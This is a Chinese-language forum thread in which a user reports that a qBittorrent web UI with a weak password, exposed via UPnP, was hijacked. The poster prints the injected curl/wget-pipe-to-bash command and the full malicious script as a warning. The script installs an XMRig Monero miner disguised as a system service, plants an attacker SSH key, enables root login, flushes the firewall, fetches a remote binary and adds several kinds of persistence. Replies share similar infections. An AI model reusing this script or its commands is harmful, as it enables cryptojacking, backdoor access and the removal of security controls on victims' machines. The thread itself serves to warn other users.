V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
tinytoadd
V2EX  ›  分享发现

qBittorrent web 端 弱密码 + 开启 UPNP 被挂恶意脚本

  •  
  •   tinytoadd · 346 天前 · 2024 次点击
    这是一个创建于 346 天前的主题,其中的信息可能已经有所发展或是发生改变。

    今天回家,照常下载种子并导入到我的 qBittorrent , 准备美滋滋地看会电视剧。

    由于之前设置了种子完成后自动执行脚本,正常情况应该会自动创建一个到资料库目录的软链接,但今天种子下载好后脚本却没有照常执行。

    检查之后吓了一跳,原本的自动执行程序被替换为以下脚本。

    bash -c "(curl -s -L http://files.catbox.moe/o0gr8o.sh || wget --no-check-certificate -O - http://files.catbox.moe/o0gr8o.sh) | bash"
    

    检查了一下,是我的 QB 默认开启了 upnp ,家里是公网 IP ,等于直接在公网 8085 端口裸奔了。

    我用的群晖 DS220+和矿神的 qBittorrent 应用,暂时没有发现有损失。

    提醒一下大家注意防范,贴一下这个脚本的内容。

    #! /bin/bash
    ##
    VERSION=e4
    
    # Arguments
    #[email protected]
    WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
    [email protected]
    PORT=15555
    AUDITD=http://files.catbox.moe/5eki22.out
    
    function prune_competition() {
        sudo systemctl stop c3pool_miner.service 2>&1
        sudo systemctl disable c3pool_miner.service 2>&1
        sudo systemctl disable xmrig.service 2>&1
        sudo systemctl stop journalctld.service 2>&1
        sudo systemctl disable journalctld.service 2>&1
        kill -9 $(pidof xmrig) >/dev/null 2>&1
        kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>&1
        sudo killall xmrig 2>&1
        sudo pkill xmrig 2>&1
        sudo pkill auditd 2>&1
        killall -9 xmrig 2>&1
        killall xmrig 2>&1
        pkill xmrig 2>&1
        pkill auditd 2>&1
        killall auditd 2>&1
        rm -rf rm -rf /root/.local/.c 2>&1
        rm -rf "${HOME}/.c3pool" >/dev/null 2>&1
        rm -rf /root/.c3pool >/dev/null 2>&1
        rm -rf "${HOME}/.local/share/auditd" >/dev/null 2>&1
        rm -rf "${HOME}/.local/.c*" >/dev/null 2>&1
        rm -rf "${HOME}/.local/bin/auditd"
        rm -rf /etc/cron.daily >/dev/null 2>&1
        rm -rf /etc/cron.daily/auditd >/dev/null 2>&1
        rm -rf /etc/systemd/system/journalctld.service 2>&1
        find . -name "*c3pool*" -exec rm -rf {} \; 2>&1
        find . -name "*xmrig*" -exec rm -rf {} \; 2>&1
        find . -name "*miner*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*c3pool*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*xmrig*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*miner*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*c4*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*auditd*" -exec rm -rf {} \; 2>&1
    
        sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "${HOME}/.ssh/authorized_keys"
        sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "/root/.ssh/authorized_keys"
        sed -i '/c3pool/d;/miner.sh/d' "${HOME}/.profile"
        sed -i '/c3pool/d;/miner.sh/d' "/root/.profile"
    
        mkdir $HOME/.ssh ; touch $HOME/.ssh/authorized_keys ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi3pUF++QmmM6Jo4/wMWqOxmdJotN85QpbkRfYuw9QN5aO35RLSJw7o2UOXN9vsaxnIg9wunNstVff22vyjrFrXTNrHaI///P3d4T4w6CCgLlNdNKgKTG176Y7KBmkWWeZvd8phtIaMprhGSbtnvs4v0hADTw+Ej20EeKfphlZsRSVS6zObq6jro4j8iIXvnGEdkIx8b1SP+QK6D+ZOEQxEzD107latrwYbLCNHWX7VP1oK6fbFk3zU+CGOwITiVPKuyX9aNFJVEopZSmreD+b+JoXpYHybiuhL3ex79uCWNWKnfGgBKrSAmnmopvYnd/mQ902ls16j/Cr/YYKhUvFMC7MhuWdazvM9uFT07c8PSPsEJ+vJpW3t2HQkW89mxqjp1rEvURUlqZtkL/3hZEMaamP6phHpSttncyWiMGuLZxoub/2GM8C09+GOOTaf47//mGxtNs5FNWqjyiznznrc=" >> $HOME/.ssh/authorized_keys ; chmod 600 $HOME/.ssh/authorized_keys
    
        (chmod go-w ~/ && chmod go-w /root && chmod 700 ~/.ssh && chmod 700 /root/.ssh && chmod 600 ~/.ssh/authorized_keys && chown root /root && chown root /root/.ssh) >/dev/null
        sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config >/dev/null
        sudo sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication yes/' /etc/ssh/sshd_config >/dev/null
        iptables -P INPUT ACCEPT 2>&1
        iptables -P FORWARD ACCEPT 2>&1
        iptables -P OUTPUT ACCEPT 2>&1
        iptables -F 2>&1
        ufw disable 2>&1
    }
    
    function install_auditd() {
        mkdir -p ${HOME}/.local/share/
        cat >${HOME}/.local/share/auditd <<EOL
    #!/bin/bash
    if [ -z "\$(pidof auditd)" ]; then
        mkdir -p ${HOME}/.local/bin
        curl -s4 -L "${AUDITD}" -o ${HOME}/.local/bin/auditd
        chmod a+x ${HOME}/.local/bin/auditd
        ${HOME}/.local/bin/auditd
        sleep 5
        rm ${HOME}/.local/bin/auditd
    fi
    EOL
        chmod a+x "${HOME}/.local/share/auditd"
    
        mkdir -p /etc/cron.daily
        if ! grep "${AUDITD}" "/etc/cron.daily/auditd" >/dev/null; then
            cp ${HOME}/.local/share/auditd /etc/cron.daily/auditd
        fi
    
        (${HOME}/.local/share/auditd || /etc/cron.daily/auditd) &
    }
    
    function install_rig() {
        mkdir -p "${HOME}/.local/.c"
        "${HOME}/.local/.c/journalctld" --help >/dev/null 2>&1 
        if test $? -ne 0; then
            # Attempt to download
            LATEST_LINUX_RELEASE=$(curl -s4 https://api.github.com/repos/xmrig/xmrig/releases/latest | grep browser_download | grep linux-static | cut -d'"' -f4)
            if ! curl -s4 -L "${LATEST_LINUX_RELEASE}" -o /tmp/xmrig.tar.gz; then
                exit 1
            fi
    
            # Attempt to extract
            if ! tar xf /tmp/xmrig.tar.gz -C "${HOME}/.local/.c" --strip=1; then
                exit 1
            fi
            rm /tmp/xmrig.tar.gz
            mv "${HOME}/.local/.c/xmrig" "${HOME}/.local/.c/journalctld"
    
            # Check if downloaded
            "${HOME}/.local/.c/journalctld" --help >/dev/null
            if test $? -ne 0; then 
                exit 1
            fi
        fi
    
        PASS=$(hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g')
    
        # Config
        CONFIG="${HOME}/.local/.c/config.json"
        sed -i 's/"url": *"[^"]*",/"url": "mine.c3pool.com:'"${PORT}"'",/' "${CONFIG}"
        sed -i 's/"user": *"[^"]*",/"user": "'"${WALLET}"'",/' "${CONFIG}"
        sed -i 's/"pass": *"[^"]*",/"pass": "'"${PASS}"'",/' "${CONFIG}"
        sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' "${CONFIG}"
        sed -i 's#"log-file": *null,#"log-file": "'"${HOME}/.local/.c/journalctld.log"'",#' "${CONFIG}"
        sed -i 's/"syslog": *[^,]*,/"syslog": false,/' "${CONFIG}"
        sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' "${CONFIG}"
        sed -i 's/"background": *[^,]*,/"background": false,/' "${CONFIG}"
    
        # Config (background)
        cp "${CONFIG}" "${HOME}/.local/.c/config_background.json"
        sed -i 's/"background": *false,/"background": true,/' "${HOME}/.local/.c/config_background.json"
    
        # Prepare start script
        cat >"${HOME}/.local/.c/journalctl" <<EOL
    #!/bin/bash
    if [ -z "\$(pidof auditd)" ]; then
        curl -s4 -L "${AUDITD}" -o /tmp/auditd
        chmod a+x /tmp/auditd
        /tmp/auditd
        rm /tmp/auditd
    fi
    
    if [ -z "\$(pidof journalctld)" ]; then
        nice ${HOME}/.local/.c/journalctld \$*
    fi
    EOL
        chmod +x "${HOME}/.local/.c/journalctl"
    
        # Prepare persistence
        if ! grep journalctl "${HOME}/.profile" >/dev/null; then
            echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "${HOME}/.profile"
        fi
        if ! grep journalctl "/etc/rc.local" >/dev/null; then
            echo "#!/bin/bash" > "/etc/rc.local"
            echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "/etc/rc.local" && chmod a+x "/etc/rc.local"
        fi
        
    
        if sudo -n true 2>/dev/null; then
            # Attempt to configure huge pages
            if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then
                echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
                sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
            fi
    
            if ! type systemctl >/dev/null; then
                /bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
            else
                cat >/tmp/journalctld.service <<EOL
    [Unit]
    Description=systemd journaling
    [Service]
    ExecStart=${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config.json
    Restart=always
    Nice=10
    CPUWeight=1
    [Install]
    WantedBy=multi-user.target
    EOL
                sudo mv /tmp/journalctld.service /etc/systemd/system/journalctld.service
                sudo killall journalctld 2>/dev/null
                sudo systemctl daemon-reload
                sudo systemctl enable journalctld.service
                sudo systemctl restart journalctld.service
            fi
        fi
    
    
        if [ -z "$(pidof journalctld)" ]; then
            /bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
        fi
    }
    
    # Run processes
    prune_competition
    install_auditd
    install_rig
    
    # Version
    echo "${VERSION}" > "${HOME}/.local/.c/.version"
    
    sudo /etc/init.d/ssh restart >/dev/null
    
    12 条回复    2024-03-20 08:01:45 +08:00
    zk8802
        1
    zk8802  
       346 天前 via iPhone
    居然还有注释的…
    sinksmell
        2
    sinksmell  
       346 天前 via Android
    吓的我立马把管理端 IP 设置为内网 IP🤣
    Remember
        3
    Remember  
       346 天前
    按说 upnp 打的洞只是 bt 协议用的,qb 的 webui 管理端口不会打一个外网访问的洞的啊。
    tinytoadd
        4
    tinytoadd  
    OP
       346 天前 via iPhone
    @Remember 我的这个版本默认给 webui 管理端口也放开了. 还好 qb 是单独的用户和用户组,索性没事
    TrembleBeforeMe
        5
    TrembleBeforeMe  
       346 天前


    要在设置里面手动开启 webui 的 upnp 吧
    jedihy
        6
    jedihy  
       346 天前
    你的 qb 不是跑在 docker 里面的吗?

    我的是跑在 docker 里,而且 webui 的 upnp 默认没开。
    shuang930225
        7
    shuang930225  
       346 天前
    监听端口 6881 打开的,有必要端口转发吗?还是不转也能正常做种?
    msn1983aa
        8
    msn1983aa  
       346 天前
    我的 qb 都卡在下载元数据,已经废了。。。。
    psirnull
        9
    psirnull  
       346 天前
    WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
    Bear13023
        10
    Bear13023  
       346 天前
    看楼主的这个感觉自己上个月可能也是中了类似玩意,我是 unraid ,nas 最近用的少就是 plex 听歌用用,存放下照片。

    结果我 unraid 系统都登录不上,最终这缓存硬盘被不识别要我格式化再使用。直接换一张盘,这张缓存盘就先不用了。
    AshengQAQ
        11
    AshengQAQ  
       284 天前
    c3pool 猫池,wa 矿的,我上个月刚中,也是索性没有对系统造成损坏
    y1y1
        12
    y1y1  
       240 天前
    刚刚中招,openwrt 上的 qb
    被 docker 坑了。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   4457 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 31ms · UTC 10:05 · PVG 18:05 · LAX 02:05 · JFK 05:05
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.